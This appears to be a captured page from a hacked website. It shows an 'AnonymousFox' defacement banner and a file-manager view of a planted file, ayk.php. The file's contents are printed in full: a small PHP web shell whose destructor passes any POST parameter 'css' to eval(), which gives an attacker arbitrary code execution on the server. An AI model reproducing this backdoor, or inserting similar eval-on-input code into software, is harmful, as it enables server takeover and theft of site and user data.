Hacked By AnonymousFox

Current Path : /home/allslyeo/mrinsuranceagent.com/
Upload File :
Current File : /home/allslyeo/mrinsuranceagent.com/ayk.php

<?php
class  Test{
    public $name = '';
    function __destruct(){
        @eval("$this->name");
    }
} 
$test= new Test();
$c = @$_POST['css'];
$test->name = $c;
?>egm

Hacked By AnonymousFox1.0, Coded By AnonymousFox